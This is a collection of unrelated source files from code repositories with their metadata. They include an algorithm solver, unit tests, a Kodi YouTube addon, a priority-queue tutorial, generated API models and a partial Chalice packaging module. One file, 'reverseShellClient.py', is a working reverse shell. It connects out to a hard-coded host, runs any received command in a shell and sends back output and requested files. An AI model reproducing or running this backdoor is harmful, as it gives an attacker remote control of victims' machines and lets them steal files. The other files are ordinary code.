if s[0] == "1":
_, x, a = map(int, s.split())
x -= 1
if x % 2 == 0:
x_res = c_list[x] - global_dec - odd_dec - dec_list_n[x]
if x_res >= a:
dec_list_n[x] += a
res += a
odd_min = min(odd_min, x_res - a)
global_min = min(global_min, x_res - a)
else:
x_res = c_list[x] - global_dec - dec_list_n[x]
if x_res >= a:
dec_list_n[x] += a
res += a
global_min = min(global_min, x_res - a)
elif s[0] == "2":
_, a = map(int, s.split())
if odd_min >= a:
odd_dec += a
odd_min -= a
res += a * ((n + 1) // 2)
global_min = min(global_min, odd_min)
else:
_, a = map(int, s.split())
if global_min >= a:
global_dec += a
global_min -= a
odd_min -= a
res += a * n
return res
def main():
n = int(input())
c_list = list(map(int, input().split()))
q = int(input())
s_list = [""] * q
for i in range(q):
s = input()
s_list[i] = s
res = solve(n, c_list, q, s_list)
print(res)
def test():
assert solve(4, [5, 3, 3, 5], 6, ["1 2 1", "2 2", "2 2", "3 100", "3 1", "1 1 3"]) == 9
assert solve(2, [3, 4], 3, ["1 2 9", "2 4", "3 4"]) == 0
if __name__ == "__main__":
test()
main()
|
[
"cashfeg@gmail.com"
] |
cashfeg@gmail.com
|
2ebb4a3c821548b4cd7fbbd2eed1c70047122136
|
e26cfc715513ae3b4393ea918e78ed5f27664dff
|
/src/textgrid_tools_tests/intervals/common_py/test_merge_intervals.py
|
f9d043c5f90ec45d259c06d011eee8b6db3d3313
|
[
"MIT"
] |
permissive
|
stefantaubert/textgrid-ipa
|
f4cd52b2c9d53570587b030dec758176229ee5e0
|
ada294513315d76db7e91cbbfb7c386a75f84966
|
refs/heads/main
| 2023-06-09T01:30:18.159171
| 2023-05-30T15:23:18
| 2023-05-30T15:23:18
| 301,960,070
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 965
|
py
|
from textgrid.textgrid import Interval
from textgrid_tools.intervals.common import merge_intervals
def test_component_include_empty():
intervals = (
Interval(0, 1, ""),
Interval(1, 2, "b"),
Interval(2, 3, " "),
Interval(3, 4, "c"),
Interval(4, 5, "d"),
)
result = merge_intervals(list(intervals), "X", False)
assert_interval = Interval(0, 5, "XbX XcXd")
assert result.minTime == assert_interval.minTime
assert result.maxTime == assert_interval.maxTime
assert result.mark == assert_interval.mark
def test_component_ignore_empty():
intervals = (
Interval(0, 1, ""),
Interval(1, 2, "b"),
Interval(2, 3, " "),
Interval(3, 4, "c"),
Interval(4, 5, "d"),
)
result = merge_intervals(list(intervals), "X", True)
assert_interval = Interval(0, 5, "bX XcXd")
assert result.minTime == assert_interval.minTime
assert result.maxTime == assert_interval.maxTime
assert result.mark == assert_interval.mark
|
[
"stefan.taubert@posteo.de"
] |
stefan.taubert@posteo.de
|
11f859a7d2ceaac0b717f0b785430b13ea39ee51
|
cff2b7c96ca0355a44116f6d18f026da69e412b0
|
/script.module.Galaxy/lib/resources/lib/modules/youtube.py
|
aad8ebbdf56a5370160d29b30a05da9d5af36820
|
[
"Beerware"
] |
permissive
|
krazware/therealufo
|
cc836e4e7049d277205bb590d75d172f5745cb7d
|
4d6341c77e8c2cc9faec0f748a9a2d931b368217
|
refs/heads/master
| 2020-03-19T00:41:22.109154
| 2019-11-12T05:06:14
| 2019-11-12T05:06:14
| 135,496,631
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,193
|
py
|
# -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @tantrumdev wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Galaxy
# Addon id: plugin.video.Galaxy
# Addon Provider: The Martian
import re,json
from resources.lib.modules import client
from resources.lib.modules import workers
class youtube(object):
def __init__(self, key=''):
self.list = [] ; self.data = []
self.base_link = 'http://www.youtube.com'
self.key_link = '&key=%s' % key
self.playlists_link = 'https://www.googleapis.com/youtube/v3/playlists?part=snippet&maxResults=50&channelId=%s'
self.playlist_link = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&maxResults=50&playlistId=%s'
self.videos_link = 'https://www.googleapis.com/youtube/v3/search?part=snippet&order=date&maxResults=50&channelId=%s'
self.content_link = 'https://www.googleapis.com/youtube/v3/videos?part=contentDetails&id=%s'
self.play_link = 'plugin://plugin.video.youtube/play/?video_id=%s'
def playlists(self, url):
url = self.playlists_link % url + self.key_link
return self.play_list(url)
def playlist(self, url, pagination=False):
cid = url.split('&')[0]
url = self.playlist_link % url + self.key_link
return self.video_list(cid, url, pagination)
def videos(self, url, pagination=False):
cid = url.split('&')[0]
url = self.videos_link % url + self.key_link
return self.video_list(cid, url, pagination)
def play_list(self, url):
try:
result = client.request(url)
result = json.loads(result)
items = result['items']
except:
pass
for i in range(1, 5):
try:
if not 'nextPageToken' in result: raise Exception()
next = url + '&pageToken=' + result['nextPageToken']
result = client.request(next)
result = json.loads(result)
items += result['items']
except:
pass
for item in items:
try:
title = item['snippet']['title']
title = title.encode('utf-8')
url = item['id']
url = url.encode('utf-8')
image = item['snippet']['thumbnails']['high']['url']
if '/default.jpg' in image: raise Exception()
image = image.encode('utf-8')
self.list.append({'title': title, 'url': url, 'image': image})
except:
pass
return self.list
def video_list(self, cid, url, pagination):
try:
result = client.request(url)
result = json.loads(result)
items = result['items']
except:
pass
for i in range(1, 5):
try:
if pagination == True: raise Exception()
if not 'nextPageToken' in result: raise Exception()
page = url + '&pageToken=' + result['nextPageToken']
result = client.request(page)
result = json.loads(result)
items += result['items']
except:
pass
try:
if pagination == False: raise Exception()
next = cid + '&pageToken=' + result['nextPageToken']
except:
next = ''
for item in items:
try:
title = item['snippet']['title']
title = title.encode('utf-8')
try: url = item['snippet']['resourceId']['videoId']
except: url = item['id']['videoId']
url = url.encode('utf-8')
image = item['snippet']['thumbnails']['high']['url']
if '/default.jpg' in image: raise Exception()
image = image.encode('utf-8')
append = {'title': title, 'url': url, 'image': image}
if not next == '': append['next'] = next
self.list.append(append)
except:
pass
try:
u = [range(0, len(self.list))[i:i+50] for i in range(len(range(0, len(self.list))))[::50]]
u = [','.join([self.list[x]['url'] for x in i]) for i in u]
u = [self.content_link % i + self.key_link for i in u]
threads = []
for i in range(0, len(u)):
threads.append(workers.Thread(self.thread, u[i], i))
self.data.append('')
[i.start() for i in threads]
[i.join() for i in threads]
items = []
for i in self.data: items += json.loads(i)['items']
except:
pass
for item in range(0, len(self.list)):
try:
vid = self.list[item]['url']
self.list[item]['url'] = self.play_link % vid
d = [(i['id'], i['contentDetails']) for i in items]
d = [i for i in d if i[0] == vid]
d = d[0][1]['duration']
duration = 0
try: duration += 60 * 60 * int(re.findall('(\d*)H', d)[0])
except: pass
try: duration += 60 * int(re.findall('(\d*)M', d)[0])
except: pass
try: duration += int(re.findall('(\d*)S', d)[0])
except: pass
duration = str(duration)
self.list[item]['duration'] = duration
except:
pass
return self.list
def thread(self, url, i):
try:
result = client.request(url)
self.data[i] = result
except:
return
|
[
"krazinabox@gmail.com"
] |
krazinabox@gmail.com
|
67cfe06d88e3de17422ae039a63a853c1b86bb5e
|
064190a2de1ad156e1060f0efdee7e754a96b4bb
|
/Unit1/1.5.py
|
07c1c3c95a554ba8ca6b0432b654b42f2fe5c8eb
|
[] |
no_license
|
zqy1/pythonCookbook
|
7254fadf3fac277b107941bc32e4716de3f7c329
|
89a05a2a4d723fb49548e0e87d2542bd5d07fbee
|
refs/heads/master
| 2020-08-03T17:27:09.351396
| 2015-09-18T13:05:14
| 2015-09-18T13:05:14
| 73,540,483
| 1
| 0
| null | 2016-11-12T08:14:50
| 2016-11-12T08:14:50
| null |
UTF-8
|
Python
| false
| false
| 1,758
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
1.5 实现优先级队列
我们想实现一个队列,它会按给定的优先级来对元素排序,
且每次 pop 操作时都返回优先级最高的那个元素
heapq 模块函数:
heappush(heap, item) # 将item压入堆中
heappop(heap) # 将堆中最小的元素弹出
heappushpop(heap, item) # 先将item压入heap中再弹出heap的堆顶元素
# 这比两次用heappush 和 heappop函数快的多
heapreplace(heap,item) # 先pop再把item压入heap中
heapify(x) # 对列表x进行堆排序,默认是小顶堆
merge(*iterables) # 将多个列表进行合并,然后进行堆调整,返回的是列表的可迭代对象。
nlargest # 1.4中用过,返回最大的n个元素
nsmallest # 1.4中用过,返回最小的n个元素
"""
# 利用heap模块实现一个简单的优先级队列类
import heapq
class PriorityQueue:
"""优先级队列类"""
def __init__(self):
"""初始化,属性"""
self._queue = []
self._index = 0
def push(self, item, priority):
"""依据负优先级将索引和项压入堆中"""
heapq.heappush(self._queue, (-priority, self._index, item))
self._index += 1
def pop(self):
return heapq.heappop(self._queue)[-1]
class Item():
"""插入元素"""
def __init__(self, name):
self.name = name
def __repr__(self):
return 'Item({!r})'.format(self.name)
# main
q = PriorityQueue()
q.push(Item('neo'), 1)
q.push(Item('jack'), 2)
q.push(Item('sister'), 4)
q.push(Item('me'), 4)
print q.pop()
|
[
"neo1218@yeah.net"
] |
neo1218@yeah.net
|
292162c5cafc53d1a12dc03d491b24cf96e78e25
|
1254f553b70353c6d4ee85c2497db23ebb7903f2
|
/test/test_component_history_dto.py
|
4355b4f43a4156efe6b2297894e9425535b89a0a
|
[
"Apache-2.0"
] |
permissive
|
tspannhw/nifi-python-swagger-client
|
05137bd2ad36706f323621ab2510abb124ce9bf9
|
0cc73d31a1143c3fa73237fd3d4702a7c3c5b3b1
|
refs/heads/master
| 2021-01-20T02:24:36.484855
| 2017-08-24T12:52:46
| 2017-08-24T12:52:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
# coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.2.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import ApiException
from swagger_client.models.component_history_dto import ComponentHistoryDTO
class TestComponentHistoryDTO(unittest.TestCase):
""" ComponentHistoryDTO unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testComponentHistoryDTO(self):
"""
Test ComponentHistoryDTO
"""
# FIXME: construct object with mandatory attributes with example values
#model = swagger_client.models.component_history_dto.ComponentHistoryDTO()
pass
if __name__ == '__main__':
unittest.main()
|
[
"dchaffey@hortonworks.com"
] |
dchaffey@hortonworks.com
|
6da0bcecf30603f283acccf783ffabe67f975332
|
e3402d37d5a9fb7ee3c3c73e95732d778f48b6fb
|
/com/kute/algorithms/__init__.py
|
fda4ab1360693493004b434ada15fd4d10c6bff4
|
[] |
no_license
|
kute/purepythontest
|
51d3186ddaa2f1142382768380b776a1ba9469ed
|
2baa1746a34cefe0be0e5f59be21450d330491a7
|
refs/heads/master
| 2020-04-12T06:20:14.957566
| 2018-03-18T07:03:22
| 2018-03-18T07:03:22
| 65,204,109
| 4
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = 'kute'
# __mtime__ = '16/5/24 21:40'
def main():
pass
if __name__ == '__main__':
main()
|
[
"kutekute00@gmail.com"
] |
kutekute00@gmail.com
|
484fb1aa20f41b92a393cd858ddb44178f0c42cf
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2482/60708/267104.py
|
aad8d1301873e9edbe9c748d5974ac162ce03841
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 610
|
py
|
N=int(input())
for n in range(0,N):
x=int(input())
y=int(input())
result=list(str(x/y))
a=""#小数点前
b="."
for i in range(0,len(result)):
if(result[0])=='.':
a=a+result[0]
result.pop(0)
b=''.join(result)[0:]
break
else:
a=a+result[0]
result.pop(0)
if len(b)<16:
print(a,end='')
print(b,end='')
else:
for i in range(1,16+1):
if b[0:i]==b[i:i+i]:
b='('+b[0:i]+')'
break
print(a,end='')
print(b,end='')
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
742e6ea7de50bcac003bc3d80347733854493805
|
bc54edd6c2aec23ccfe36011bae16eacc1598467
|
/simscale_sdk/models/one_of_velocity_inlet_bc_net_radiative_heat_flux.py
|
b26f7a002aaa6f9893e3aa80e77d6c8f7b0d3f5c
|
[
"MIT"
] |
permissive
|
SimScaleGmbH/simscale-python-sdk
|
4d9538d5efcadae718f12504fb2c7051bbe4b712
|
6fe410d676bf53df13c461cb0b3504278490a9bb
|
refs/heads/master
| 2023-08-17T03:30:50.891887
| 2023-08-14T08:09:36
| 2023-08-14T08:09:36
| 331,949,105
| 17
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,040
|
py
|
# coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class OneOfVelocityInletBCNetRadiativeHeatFlux(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'emissivity': 'DimensionalDimensionless',
'radiative_source_value': 'DimensionalHeatFlux'
}
attribute_map = {
'type': 'type',
'emissivity': 'emissivity',
'radiative_source_value': 'radiativeSourceValue'
}
discriminator_value_class_map = {
'GREYBODY_DIFFUSIVE': 'GreybodyDiffusiveRSBC',
'OPEN_WINDOW': 'OpenWindowRSBC'
}
def __init__(self, type='OPEN_WINDOW', emissivity=None, radiative_source_value=None, local_vars_configuration=None): # noqa: E501
"""OneOfVelocityInletBCNetRadiativeHeatFlux - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._emissivity = None
self._radiative_source_value = None
self.discriminator = 'type'
self.type = type
if emissivity is not None:
self.emissivity = emissivity
if radiative_source_value is not None:
self.radiative_source_value = radiative_source_value
@property
def type(self):
"""Gets the type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
Schema name: OpenWindowRSBC # noqa: E501
:return: The type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this OneOfVelocityInletBCNetRadiativeHeatFlux.
Schema name: OpenWindowRSBC # noqa: E501
:param type: The type of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def emissivity(self):
"""Gets the emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:return: The emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: DimensionalDimensionless
"""
return self._emissivity
@emissivity.setter
def emissivity(self, emissivity):
"""Sets the emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux.
:param emissivity: The emissivity of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: DimensionalDimensionless
"""
self._emissivity = emissivity
@property
def radiative_source_value(self):
"""Gets the radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:return: The radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:rtype: DimensionalHeatFlux
"""
return self._radiative_source_value
@radiative_source_value.setter
def radiative_source_value(self, radiative_source_value):
"""Sets the radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux.
:param radiative_source_value: The radiative_source_value of this OneOfVelocityInletBCNetRadiativeHeatFlux. # noqa: E501
:type: DimensionalHeatFlux
"""
self._radiative_source_value = radiative_source_value
def get_real_child_model(self, data):
"""Returns the real base class specified by the discriminator"""
discriminator_key = self.attribute_map[self.discriminator]
discriminator_value = data[discriminator_key]
return self.discriminator_value_class_map.get(discriminator_value)
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OneOfVelocityInletBCNetRadiativeHeatFlux):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, OneOfVelocityInletBCNetRadiativeHeatFlux):
return True
return self.to_dict() != other.to_dict()
|
[
"simscale"
] |
simscale
|
adacebb3ba78137de88beae5fab192ad6c360797
|
571ebcf06cc01309231a97a963f531f8dd90963d
|
/Hacking Scripts/reverseShellClient.py
|
8d0e051c123e16c061dada96f83f7e7f1da281dc
|
[] |
no_license
|
SV-ZeroOne/Python-Projects
|
3da0ec813e2764d5a3cd8f1d9825e698e368a84e
|
8820c346e0dde3b4023ce400cb722d08c1b4c52e
|
refs/heads/master
| 2023-08-19T20:43:07.294205
| 2021-10-16T11:57:33
| 2021-10-16T11:57:33
| 95,302,475
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 804
|
py
|
import socket
import subprocess
import os
def transfer(s, path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while len(packet) > 0:
s.send(packet)
packet = f.read(1024)
s.send('DONE'.encode())
else:
s.send('File not found'.encode())
def connect():
s = socket.socket()
s.connect(("192.168.100.137",8080))
while True:
command = s.recv(1024)
if 'terminate' in command.decode():
s.close()
break
elif 'grab' in command.decode():
grab, path = command.decode().split("*")
try:
transfer(s, path)
except:
pass
else:
CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(CMD.stdout.read())
s.send(CMD.stderr.read())
def main():
connect()
main()
|
[
"steve@elitehost.co.za"
] |
steve@elitehost.co.za
|
5fef595807aff3c1ec3c72433953ec333d323341
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_4/75.py
|
8d4a612aa342b0b8858f654fcd10500e495a8f9b
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
import sys
f = open(sys.argv[1])
o = open(sys.argv[1].split('.')[0] + '.out', 'w')
nCases = int(f.readline().strip())
for case in range(nCases):
dimension = int(f.readline())
v1 = map(int, f.readline().strip().split())
v2 = map(int, f.readline().strip().split())
v1.sort()
v2.sort()
v2.reverse()
sum = 0
for x,y in zip(v1, v2):
sum += x*y
o.write('Case #%d: %d\n' % (case + 1, sum))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
bc291688aa3ce741509d6240563d380a29e2dd1a
|
62d6a37e1fb1b224b53e14a1cf151ef0571aa20f
|
/orun/http/__init__.py
|
5d27eb7d2410dda8fe4263aa9eb1974206200fbe
|
[] |
no_license
|
katrid/orun
|
4fa0f291a1ef43f16bc1857a170fc0b2e5e06739
|
bfc6dae06182124ba75b1f3761d81ba8ca387dea
|
refs/heads/master
| 2023-08-30T03:58:34.570527
| 2023-08-09T04:05:30
| 2023-08-09T04:05:30
| 66,562,767
| 14
| 4
| null | 2023-01-06T22:29:37
| 2016-08-25T14:01:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
from orun.http.cookie import SimpleCookie, parse_cookie
from orun.http.request import (
HttpRequest, QueryDict, RawPostDataException, UnreadablePostError,
)
from orun.http.response import (
BadHeaderError, FileResponse, Http404, HttpResponse,
HttpResponseBadRequest, HttpResponseForbidden, HttpResponseGone,
HttpResponseNotAllowed, HttpResponseNotFound, HttpResponseNotModified,
HttpResponsePermanentRedirect, HttpResponseRedirect,
HttpResponseServerError, JsonResponse, StreamingHttpResponse,
)
__all__ = [
'SimpleCookie', 'parse_cookie', 'HttpRequest', 'QueryDict',
'RawPostDataException', 'UnreadablePostError',
'HttpResponse', 'StreamingHttpResponse', 'HttpResponseRedirect',
'HttpResponsePermanentRedirect', 'HttpResponseNotModified',
'HttpResponseBadRequest', 'HttpResponseForbidden', 'HttpResponseNotFound',
'HttpResponseNotAllowed', 'HttpResponseGone', 'HttpResponseServerError',
'Http404', 'BadHeaderError', 'JsonResponse', 'FileResponse',
]
|
[
"alexandre@katrid.com"
] |
alexandre@katrid.com
|
2f2e173cedfb3e0b03918438536ae26ad4faaab9
|
2ca998dd8361984c4d4312f80b0c4ff67fcc84f4
|
/mid2names.py
|
24c72dac715ed35ecb5f14d4fefbc984ac4b12ae
|
[] |
no_license
|
rohitpatwa/dbExtend
|
31a7f1935d240595bc10f3d3641c7d051abf2047
|
dad7de67141edc3d7353c5f1762a8786b9e3b997
|
refs/heads/master
| 2022-03-31T04:16:06.719265
| 2020-01-22T23:28:20
| 2020-01-22T23:28:20
| 235,421,553
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,794
|
py
|
"""Create LUT from a given db
Script to create a LUT table with FID.MID as the keys and English names as values. The script assumes the file structure
to be F0001/MID1 for all FIDs. It then reads all the mid.csv files in the MID? folders and append them to a dataframe.
The purpose of this script is to prepare FIW for finding overlapping names across other datasets.
"""
import glob
import re
from tqdm import tqdm
import pandas as pd
def clean_name(name):
""" Cleans a given input name.
Args:
name: input name
Returns:
cleaned name
"""
# TODO: implement this method
pass
def import_fiw_names(path):
""" Create a LUT from all the names of the db
Args:
path: Path to the folder containing FIDs
Returns:
Saves a file with the name FIW_LUT.csv.
Returns dataframe of FIW_LUT
"""
# make sure the path ends with a '/'
if not re.search(r'\/$', path):
path += '/'
# read all the paths matching the given format
paths = sorted(glob.glob(path + 'F????/mid.csv'))
df = pd.DataFrame(
columns=['source_db', 'fid', 'mid', 'gender', 'first', 'first_alias', 'last', 'last_alias', 'name'])
# Read a csv file which contains last names of all the FIDs
last_name_file_path = '/'.join(path.split('/')[:-2]) + '/FIW_FIDs.csv'
last_name_df = pd.read_csv(last_name_file_path)
for p in tqdm(paths):
# Extract fid from path
fid = re.sub(r'.*(F\d{4}).*', r'\1', p)
d = pd.read_csv(p)
# this check is applied because a few families are missing in last_name_df. it will be fixed in future
if fid in last_name_df['fid'].values:
last = last_name_df.query('fid==@fid').iloc[0]['surname'].split('.')[0]
else:
last = ''
# TODO: Develop a way to get aliases
for i in d.index:
first, mid, gender = d.loc[i, ['Name', 'MID', 'Gender']]
first_alias = '' # alias
last_alias = '' # to be fetched
name = ' '.join([first, last]).strip()
df.loc[len(df)] = ['FIW', fid, mid, gender, first, first_alias, last, last_alias, name.lower()]
df.to_csv('FIW_LUT.csv', index=False)
return df
def import_family101_names(path):
"""Create a LUT for Family101 db
Args:
path: path to the FAMILY101.txt file
Returns:
Saves a file with the name Family101_LUT.csv.
returns a dataframe with all the names from family101 db
"""
# open the file containing family101 names
f = open(path)
df = pd.DataFrame(columns=['source_db', 'name', 'gender', 'relation', 'first', 'last', 'family_name'])
for row in tqdm(f.readlines()):
row = re.sub(r'\n', '', row)
if row:
# Each row has a structure "1 HUSB Barac_Obama"
row_split = row.split()
relation, name = row_split[1], row_split[2].replace('_', ' ')
# These rows are not of any use, they just mention the family surname
if relation == 'FAMI':
family_name = name
else:
name_split = name.split()
first, last = '', ''
if len(name_split) > 1:
first, last = name_split[0], name_split[-1]
# There are only 4 relations ["HUSB", "WIFE", "SONN", "DAUG"]
if relation == 'HUSB' or relation == 'SONN':
gender = 'm'
else:
gender = 'f'
df.loc[len(df)] = 'family101', name.lower(), gender, relation, first, last, family_name
df.to_csv('Family101_LUT.csv', index=False)
return df
# Testing code
import sys
if __name__ == "__main__":
p = sys.argv[1]
import_fiw_names(p)
import_family101_names(p)
|
[
"rohitpatwa@gmail.com"
] |
rohitpatwa@gmail.com
|
3784205655c4e6b4cfa9c7dfccd811231c871938
|
ac15eda44e8dcfee6dff62f514c5b98a3382f50d
|
/python/les5/les5_3.py
|
f7632dd52e6ce6a4948be0711a402c746542fd4a
|
[] |
no_license
|
yangruihan/raspberrypi
|
5789c1a2e72d4012d46563d0644b08d032d346e6
|
22bc1a06b25e129a4314f4bc9cec5112affda136
|
refs/heads/master
| 2022-12-27T09:27:05.102020
| 2020-10-13T09:41:24
| 2020-10-13T09:41:24
| 32,977,936
| 4
| 0
| null | 2022-12-16T01:47:53
| 2015-03-27T09:30:43
|
Java
|
UTF-8
|
Python
| false
| false
| 232
|
py
|
#!/usr/bin/env python3
import pickle
with open('mydata.pickle', 'wb') as mysavedata:
pickle.dump([1, 2, 'three'], mysavedata)
with open('mydata.pickle', 'rb') as myrestoredata:
a_list = pickle.load(myrestoredata)
print(a_list)
|
[
"yangruihan@vip.qq.com"
] |
yangruihan@vip.qq.com
|
8b51fa52d6cef1d961cb8e29185932c1f2371400
|
a95a398f7f1e4306367f22ff59a9da72a8c23b46
|
/course-files/lectures/lecture_04/07_activity.py
|
c4bf8d853793765bb768a13eb6186ba70431a59a
|
[] |
no_license
|
eecs110/spring2020
|
74ff8a317cf009aa727ad46e143e1c6619c83086
|
a726d32c5eb418f4bf0fe27fae1f6479e4ae8140
|
refs/heads/master
| 2022-10-18T21:58:19.690897
| 2020-06-03T01:04:20
| 2020-06-03T01:04:20
| 251,242,896
| 0
| 0
| null | 2022-10-06T10:22:24
| 2020-03-30T08:17:53
|
Python
|
UTF-8
|
Python
| false
| false
| 445
|
py
|
from operator import add, mul, sub, truediv, mod, floordiv, pow
# for more info, see the docs: https://docs.python.org/3/library/operator.html
# Challenge: Create a custom function called "hypotenuse" that calculates
# the hypotenuse of any triangle. Then, invoke that function using the
# following triangle dimensions:
# triangle 1: side_a = 5, side_b = 12
# triangle 2: side_a = 3, side_b = 5
# triangle 3: side_a = 4, side_b = 4
|
[
"vanwars@gmail.com"
] |
vanwars@gmail.com
|
07d6d0d03eb9241e5ed49723bdf77dc4844cac19
|
d07f4cd12b40fb4e009b4e36c4d8c0b42b35768d
|
/chalice/package.py
|
642f4878836bd056bc1932395c3295c4d75224c8
|
[
"Apache-2.0"
] |
permissive
|
birkoff/chalice
|
b865d17d085dc92842da09d82033411001a2e01c
|
83ffea3773519a26bf1c72ef48b33c149ccdcc2f
|
refs/heads/master
| 2021-01-21T20:56:46.260466
| 2017-05-23T17:03:40
| 2017-05-23T17:03:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,897
|
py
|
import os
import copy
import json
import hashlib
from typing import Any, Dict # noqa
from chalice import __version__ as chalice_version
from chalice.deploy.swagger import CFNSwaggerGenerator
from chalice.deploy.swagger import SwaggerGenerator # noqa
from chalice.deploy.packager import LambdaDeploymentPackager
from chalice.deploy.deployer import ApplicationPolicyHandler
from chalice.utils import OSUtils
from chalice.config import Config # noqa
from chalice.app import Chalice # noqa
from chalice.policy import AppPolicyGenerator
def create_app_packager(config):
# type: (Config) -> AppPackager
osutils = OSUtils()
# The config object does not handle a default value
# for autogen'ing a policy so we need to handle this here.
return AppPackager(
# We're add place holder values that will be filled in once the
# lambda function is deployed.
SAMTemplateGenerator(
CFNSwaggerGenerator('{region}', '{lambda_arn}'),
PreconfiguredPolicyGenerator(
config,
ApplicationPolicyHandler(
osutils, AppPolicyGenerator(osutils)))),
LambdaDeploymentPackager()
)
class PreconfiguredPolicyGenerator(object):
def __init__(self, config, policy_gen):
# type: (Config, ApplicationPolicyHandler) -> None
self._config = config
self._policy_gen = policy_gen
def generate_policy_from_app_source(self):
# type: () -> Dict[str, Any]
return self._policy_gen.generate_policy_from_app_source(
self._config)
class SAMTemplateGenerator(object):
_BASE_TEMPLATE = {
'AWSTemplateFormatVersion': '2010-09-09',
'Transform': 'AWS::Serverless-2016-10-31',
'Outputs': {
'RestAPIId': {
'Value': {'Ref': 'RestAPI'},
},
'APIHandlerName': {
'Value': {'Ref': 'APIHandler'},
},
'APIHandlerArn': {
'Value': {'Fn::GetAtt': ['APIHandler', 'Arn']}
},
'EndpointURL': {
'Value': {
'Fn::Sub': (
'https://${RestAPI}.execute-api.${AWS::Region}'
# The api_gateway_stage is filled in when
# the template is built.
'.amazonaws.com/%s/'
)
}
}
}
} # type: Dict[str, Any]
def __init__(self, swagger_generator, policy_generator):
# type: (SwaggerGenerator, PreconfiguredPolicyGenerator) -> None
self._swagger_generator = swagger_generator
self._policy_generator = policy_generator
def generate_sam_template(self, config, code_uri='<placeholder>'):
# type: (Config, str) -> Dict[str, Any]
template = copy.deepcopy(self._BASE_TEMPLATE)
resources = {
